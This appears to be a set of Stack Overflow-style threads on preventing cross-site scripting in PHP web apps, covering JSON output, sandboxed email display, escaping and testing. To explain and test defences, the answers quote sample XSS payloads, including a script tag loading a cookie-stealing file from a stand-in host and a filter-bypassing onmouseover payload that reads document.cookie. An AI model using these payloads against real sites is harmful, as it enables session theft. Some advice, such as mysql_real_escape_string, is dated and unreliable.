I am thinking of secure ways to serve HTML and JSON to JavaScript. Currently I am just outputting the JSON like:
ajax.php?type=article&id=15
{
"name": "something",
"content": "some content"
}
but I do realize this is a security risk, because the articles are created by users. So someone could insert script tags (just an example) into the content and link to his article directly in the AJAX API. Thus, I am now wondering what's the best way to prevent such issues. One way would be to encode all non-alphanumeric characters from the input, and then decode them in JavaScript (and encode them again when inserting them into the page).
Another option could be to send some headers that force the browser to never render the response of the AJAX API requests (Content-Type and X-Content-Type-Options).
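For concreteness, a minimal sketch of that header idea in ajax.php might look like this (the array contents are placeholders for whatever the real lookup by type and id returns):
<?php
// ajax.php -- minimal sketch of the header-based approach described above.
$article = ['name' => 'something', 'content' => 'some content'];

// Declare the response as data, and tell the browser not to sniff otherwise.
header('Content-Type: application/json; charset=utf-8');
header('X-Content-Type-Options: nosniff');

echo json_encode($article);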
If you set the Content-Type to application/json then no browser will execute JavaScript on that page. This is part of RFC 4627, and Google uses this to protect themselves. Other application/* content types follow similar rules.
You still have to worry about DOM-based XSS; however, this would be a problem with your JavaScript, not really with the content of the JSON. Another, more exotic security concern with JSON is information leakage, like this vulnerability in Gmail.
Make sure to always test your code. There is the free Sitewatch XSS scanner, or the open-source Skipfish, and finally you could test this manually with a simple <script>alert(/xss/)</script>.
Instead of worrying about how you could encode the malicious code when you return it, you should probably take care that it does not even get into your database. A quick Google search on preventing cross-site scripting and input validation might help you here. Cheers
If the user has to be logged in to view the web page then secure the ajax.php with the same authorization mechanism. Then a client that's not logged in cannot access ajax.php directly to retrieve the data.
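A hedged sketch of what that could look like at the top of ajax.php, assuming the login code stores a user ID in the session (adjust to whatever mechanism your pages actually use):
<?php
// ajax.php -- reuse the same session check the regular pages use.
session_start();

if (empty($_SESSION['user_id'])) {
    header('Content-Type: application/json; charset=utf-8');
    http_response_code(403);
    echo json_encode(['error' => 'not authorized']);
    exit;
}

// ...continue to look up and output the requested article...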
I don't think your question is about validating user input, as others pointed out. You don't want to provide your JSON API to other people... right?
If this is the case then there isn't much you can do... in fact, even if you were serving HTML instead of JSON, people would still be doing HTML scraping to get what they wanted from your site (this is how search engine spiders work).
A good way to prevent scraping is to allow only a specific number of downloads from an IP address. This way, if someone is requesting http://yoursite.com/somejson.json more than 100 times a day, you probably know it's a scraper and not someone visiting your page 100 times in one day.
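A rough sketch of such a counter, assuming the APCu extension is available (the limit and window are arbitrary example values):
<?php
// Per-IP throttle for the JSON endpoint.
$key   = 'downloads_' . $_SERVER['REMOTE_ADDR'];
$limit = 100;      // requests allowed...
$ttl   = 86400;    // ...per 24 hours

apcu_add($key, 0, $ttl);     // create the counter if it does not exist yet
$count = apcu_inc($key);     // atomically increment it

if ($count > $limit) {
    http_response_code(429); // Too Many Requests
    exit('Rate limit exceeded');
}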
Insertion of script tags (or SQL) is only a problem if you fail to ensure, at the point where it could cause harm, that it doesn't.
A <script> tag in the middle of a comment that somebody submits will not hurt your server and it won't hurt your database. What it would hurt, if you fail to take appropriate measures, would be a page that includes the comment when you subsequently serve it up and it reaches a client browser. In order to prevent that from happening, your code that prepares the page must make sure that user-supplied content is always scrubbed before it is exposed to an unaware interpreter. In this case, that unaware interpreter is a client web browser. In fact, your client web browser really involves two unaware interpreters: the HTML parser & layout engine and the Javascript interpreter.
Another important example of an unaware interpreter is your database server. Note that a <script> tag is (almost certainly) harmless to your database, because "<script>" doesn't mean anything in SQL. It's other sorts of input that cause problems for SQL, like quotes in strings (which are harmless to your HTML pages!).
Stackoverflow would be pretty lame if I couldn't put <script> tags in my answers, as I'm doing now. Same goes for examples of SQL Injection attacks. Recently somebody linked a page from some prominent US bank, where a big <textarea> was footnoted by a warning not to include the characters "<" or ">" in whatever you typed. Predictably, the bank was ridiculed over hundreds of Reddit comments, and rightly so.
Exactly how you "scrub" user-supplied content depends on the unaware interpreter to which you're delivering it. If it's going to be dropped in the middle of HTML markup, then you have to make sure that the "<", ">", and "&" characters are all encoded as HTML entities. (You might want to do quote characters too, if the content might end up in an HTML element attribute value.) If the content is to be dropped into JavaScript, however, you may not need to worry about HTML escaping, but you do need to worry about quotes, and possibly Unicode characters outside the 7-bit range.
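For example, in PHP the scrubbing for those two contexts might look like this ($comment is a placeholder for the user-supplied content):
<?php
// HTML context: encode <, >, & (and quotes, via ENT_QUOTES) as entities.
echo '<p>' . htmlspecialchars($comment, ENT_QUOTES, 'UTF-8') . '</p>';

// JavaScript string context: let json_encode() handle quotes and non-ASCII characters.
echo '<script>var comment = ' . json_encode($comment) . ';</script>';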
For outputting safe HTML from PHP, I recommend http://htmlpurifier.org/
What would be the recommended way to securely view emails in a browser (in PHP)?
Emails are highly insecure content, and desktop email software obviously implements only a very limited subset of HTML and no JavaScript at all to prevent attacks. But if I took an email's HTML source and displayed it in a browser, JavaScript code and other things would be executed.
I thought a solution would be to send a header like this along with the email source:
header("Content-Security-Policy: sandbox");
But this would prevent me from fetching inline images from the server, as I would still need a PHP session ID to be transmitted so the server knows the user is allowed to fetch this content.
As there are many web email clients out there I wonder if there is a best practice model.
(FYI: I am trying to implement my own web email tool to fit the specific needs of a larger software suite.)
You can address the issue of images by not requiring authentication and then making the URLs hard to guess (ex: <img src="/resources/SomeReallyLongHardToGuessRandomString">).
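A minimal sketch of generating such an identifier (how you store the token-to-attachment mapping is up to you):
<?php
$token  = bin2hex(random_bytes(32));   // 64 hex characters, practically unguessable
$imgTag = '<img src="/resources/' . $token . '">';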
More broadly though, securely displaying user generated HTML is hard. Like really hard. This is a case where you should use a library. Keep in mind that you might have a user with a browser that is too old for the Content-Security-Policy header. This browser would happily run any scripts on the page. HTML Purifier is my personal choice, but there are others. Also, keep in mind that this is a dependency you will want to update often as people are constantly discovering new bugs.
As an additional line of defense, many sites use a separate domain for user-generated content. For example, Google uses googleusercontent.com. That way, if something does slip by, they haven't compromised the whole application. Note that this would still be bad, as an attacker might be able to read user content they shouldn't be able to (emails in this case).
I finally decided to modify the HTML source of the email (in my php script) to serve the inline images as base64 encoded data inside the HTML source. Therefore no additional loading of images is needed:
<img src="data:image/gif;base64,R0lGODlhDgE3APf/ALJUMt3W0aMyFPTixGRHOXNXSvnu3b1sSu7SpPLduurTxapEIvbly/bq4+bAffTo31Q1J/369dGafaAtDO3o5ePd2c6Tdfz6+a9...">
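For illustration, building such a data URI in PHP might look roughly like this; the variable names and the cid: replacement are assumptions about how the mail parts are referenced:
<?php
$imageData = file_get_contents($pathToInlineImage);
$mimeType  = 'image/gif';   // in practice, read this from the MIME part

$dataUri = 'data:' . $mimeType . ';base64,' . base64_encode($imageData);
$html    = str_replace('cid:' . $contentId, $dataUri, $html);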
This will solve the current problem of displaying emails, because then I can keep my
header("Content-Security-Policy: sandbox");
since it is one major way to prevent attacks from being successful. Additionally, for enhanced security, I plan to look again into roundcubemail and see how it handles this problem, and also use HTMLPurifier to further strip the email source of possible threats.
I'm reading about XSS to educate myself on security while working with PHP. I'm referring to this article, in which they talk about XSS and some of the rules that should be adhered to.
Could someone explain Rules #0 and #1 for me? I understand some of what they are saying, but when they say "untrusted data", do they mean data entered by the user?
I'm working on some forms and I'm trying to adhere to these rules to prevent XSS. The thing is, I never output anything to the user once the form is complete. All I do is process the data and save it to text files. I've done some client-side and a lot of server-side validation, but I can't figure out what they mean by "never insert untrusted data except in allowed locations".
By escaping do they mean closing tags - </>?
Rule #0 means that you should not output untrusted data in locations of your web page where it is expected to run as instructions.
As shown in the article you linked, do not put user-generated data inside <script> tags. For example, this is a no-no:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+<?=$username?>+"!";
</script>
Looks pretty safe, right? Well, what if your $username variable contains the following value:
""; console.log(document.cookie);//
So what your website is actually going to serve is this:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+""; console.log(document.cookie);//+"!";
</script>
So someone can easily steal your users' cookies and elevate their privileges. Now imagine that you're using similar code to, say, show which user created the latest post, updated via AJAX. That's a disaster waiting to happen if you do something like the above (and do not sanitize the username in the first place).
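For what it's worth, one common fix for the snippet above (a sketch, not taken from the linked article) is to let json_encode() produce the JavaScript string literal, so the value cannot break out of its context:
<script>
var usernameSpanTag = document.getElementById('username');
// json_encode() emits a valid JavaScript string literal, and JSON_HEX_TAG
// also neutralizes any "</script>" hidden inside the value.
usernameSpanTag.innerText = "Welcome back, " + <?= json_encode($username, JSON_HEX_TAG) ?> + "!";
</script>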
The same applies to <style>, <img>, <embed>, <iframe> or any other tag that lets you run scripts or import resources. It also applies to comments: browsers ignore comments, but some interpreters, like the JSP parser, handle HTML comments as template text and do not ignore their contents.
Rule #1 is pretty similar to Rule #0. If you're developing web applications, at some point or another you will have to output user-generated data, whether it is an email address, a username, a name, or whatever.
If you're developing a forum, probably you may want to give your users some styling options for their text. Basic stuff like bold letters, underlined and italics should suffice. If you want to get fancy, you may even let your users change the font.
An easy way to do that, without too many complications, is just letting users write their own HTML if they choose to do so. But if you then output that HTML from your users unescaped, even in otherwise "safe" locations like between <p> tags, that's a disaster waiting to happen as well.
Because I can write:
Hey everybody, this is my first post <script src="//malicioussite.io/hackingYoCookiez.js"></script>!
If you don't escape that input, people will only see:
Hey everybody, this is my first post!
but your browser will also load an external script that tells it to send everybody's cookies to a remote location.
So always escape the data. If you're using PHP you can use htmlentities(), or a template engine like Twig, which automatically escapes output for you.
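For instance, with the forum post from above:
<?php
$post = 'Hey everybody, this is my first post <script src="//malicioussite.io/hackingYoCookiez.js"></script>!';

// htmlentities() turns the markup into inert text:
echo htmlentities($post, ENT_QUOTES, 'UTF-8');
// The browser now displays the tag literally instead of loading the script:
// Hey everybody, this is my first post &lt;script src=&quot;//malicioussite.io/hackingYoCookiez.js&quot;&gt;&lt;/script&gt;!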
Following on from a question I asked about escaping content when building a custom CMS, I wanted to find out how dangerous not escaping content from the DB can be, assuming the data has been filtered/validated prior to insertion into the DB.
I know it's a best practice to escape output but I'm just not sure how easy or even possible it is for someone to 'inject' a value into page content that is to be displayed.
For example let's assume this content with HTML markup is displayed using a simple echo statement:
<p>hello</p>
Admittedly it won't win any awards as far as content writing goes ;)
My question is: can someone alter that for evil purposes, assuming it was filtered/validated prior to DB insertion?
Always escape for the appropriate context; it doesn't matter if it's JSON or XML/HTML or CSV or SQL (although you should be using placeholders for SQL and a library for JSON), etc.
Why? Because it's consistent. And being consistent is also a form of being lazy: you don't need to ponder if the data is "safe for HTML" because it shouldn't matter. And being lazy (in a good way) is a valuable programming trait. (In this case it's also being lazy about avoiding having to fix "bugs" due to changes in the future.)
Don't omit escaping "because it will never contain data that needs to be escaped"... because one day, in one situation or another, that assumption will be wrong.
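As a sketch of what "escape for the appropriate context" looks like in PHP (a PDO connection $pdo and a string $body are assumed to exist):
<?php
$stmt = $pdo->prepare('INSERT INTO comments (body) VALUES (?)');  // SQL: placeholders
$stmt->execute([$body]);

echo htmlspecialchars($body, ENT_QUOTES, 'UTF-8');   // HTML: entity-encode
echo json_encode(['body' => $body]);                 // JSON: let the library do the quoting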
If you do not escape your HTML output, someone could simply insert scripts into the HTML code of your page, which would then run in the browser of every client that visits it. This is called cross-site scripting (XSS).
For example:
<p>hello</p><script>alert('I could run any other Javascript code here!');</script>
In the place of the alert(), you can use basically anything: access cookies, manipulate the DOM, communicate with other servers, et cetera.
Well, this is a very easy way of inserting scripts, and strip_tags can protect against this one. But there are hundreds of more sophisticated tricks that strip_tags simply won't protect against.
If you really want to store and output HTML, HTMLPurifier could be your solution:
Hackers have a huge arsenal of XSS vectors hidden within the depths of the HTML specification. HTML Purifier is effective because it decomposes the whole document into tokens, removes non-whitelisted elements, checks the well-formedness and nesting of tags, and validates all attributes according to their RFCs. HTML Purifier's comprehensive algorithms are complemented by a breadth of knowledge, ensuring that richly formatted documents pass through unstripped.
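Basic usage is short; a sketch assuming the library is on the include path (Composer autoloading works just as well):
<?php
require_once 'HTMLPurifier.auto.php';

$config   = HTMLPurifier_Config::createDefault();
$purifier = new HTMLPurifier($config);

echo $purifier->purify($dirtyHtmlFromDb);   // only whitelisted, well-formed HTML survives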
It could, for example, also be a problem linked with some other vulnerability such as SQL injection. Then someone would be able to bypass the filtering/validation prior to adding data to the DB and display whatever they want.
If you are pulling the word hello from the database and displaying it, nothing will happen. If the content contains <script> tags, though, then it is dangerous, because a user's cookies can be stolen and used to hijack their session.
I have had issues with XSS. Specifically, I had an individual inject a JS alert showing that my input had vulnerabilities. I have done research on XSS and found examples, but for some reason I can't get them to work.
Can I get example(s) of XSS that I can throw into my input and when I output it back to the user see some sort of change like an alert to know it's vulnerable?
I'm using PHP and I am going to implement htmlspecialchars(), but first I am trying to reproduce these vulnerabilities.
Thanks!
You can use this Firefox add-on:
XSS Me
XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS). It does NOT currently test for stored XSS.
The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an XSS attack. If the resulting HTML page sets a specific JavaScript value (document.vulnerable=true) then the tool marks the page as vulnerable to the given XSS string. The tool does not attempt to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.
You can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.
For example:
<script>alert("XSS")</script>
"><b>Bold</b>
'><u>Underlined</u>
It is very good to use some of the automated tools; however, you won't gain any insight or experience from those.
The point of an XSS attack is to execute JavaScript in a browser window that is not supplied by the site. So first you must look at the context in which the user-supplied data is printed on the website: it might be within a <script></script> code block, within a <style></style> block, used as an attribute of an element (<input type="text" value="USER DATA" />), or, for instance, inside a <textarea>. Depending on that, you will see what syntax you need to escape the context (or use it); for instance, if you are within <script> tags, it might be sufficient to close the parentheses of a function and end the line with a semicolon, so the final injection will look like ); alert(555);. If the data supplied is used as an HTML attribute, the injection might look like " onclick="alert(1)", which will cause JS execution if you click on the element (this area is rich to play with, especially with HTML5).
The point is that the context of the XSS is just as important as any filtering/sanitizing functions that might be in place, and often there are small nuances that an automated tool will not catch. As you can see above, even without quotes and HTML tags, in a limited number of circumstances you might be able to bypass the filters and execute JS.
Browser encoding also needs to be considered; for instance, you might be able to bypass filters if the target browser uses UTF-7 encoding (and you encode your injection that way). Filter evasion is a whole other story; however, the current PHP functions are pretty bulletproof if used correctly.
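"Used correctly" mostly comes down to being explicit about quote handling and character set, so encoding tricks like UTF-7 have nothing to latch onto, e.g.:
<?php
header('Content-Type: text/html; charset=utf-8');
echo htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');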
Also here is a long enough list of XSS vectors
As a last thing, here is an actual example of an XSS string that was found on a site, and I guarantee you that not a single scanner would have found it (there were various filters and word blacklists, and the page allowed inserting basic HTML formatting to customize your profile page):
<a href="Boom"><font color=a"onmouseover=alert(document.cookie);"> XSS-Try ME</span></font>
Ad-hoc testing is OK, however I also recommend trying a web application vulnerability scanning tool to ensure you haven't missed anything.
Acunetix is pretty good and has a free trial of their application:
http://www.acunetix.com/websitesecurity/xss.htm
(Note I have no affiliation with this company, however I have used the product to test my own applications).
I have a form, and as of right now you can type any JavaScript you want into it. Any XSS, etc.
How do I go about creating a whitelist so that only certain characters can be posted?
At some point I would like anything that starts with http:// to be converted to a link.
Thanks
Is this efficient?
http://htmlpurifier.org/
jQuery or Javascript is preferred
Well, no, you can't do that, you see? Because even if you "sanitize" your data using JavaScript, no one's stopping anyone from:
turning off javascript
using a browser's developer console to mess with the data
doing the POST directly, without a browser
In other words, you have to perform the validation/sanitization on the server side. Javascript validation is there to enhance the experience of your users (by providing instant feedback on invalid input, for example).
But still, in many high-load applications developers use partial client-side verification (though all inputs still have to be prepared before being written to the DB).
As you will be using PHP, I suggest you process your $_POST values with htmlspecialchars(), mysql_real_escape_string() and so on.
You will have to use a regular expression to convert anything that starts with "http://" into links (well, you can also use explode('.', $_POST['yourInput']), which may be easier for you).
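A hedged sketch of that server-side flow, with a deliberately simple pattern that is only meant to show the order of operations (escape first, then linkify):
<?php
$text = htmlspecialchars($_POST['yourInput'], ENT_QUOTES, 'UTF-8');

// Turn anything that starts with http:// (or https://) into a link.
$text = preg_replace('#(https?://[^\s<]+)#i', '<a href="$1">$1</a>', $text);

echo $text;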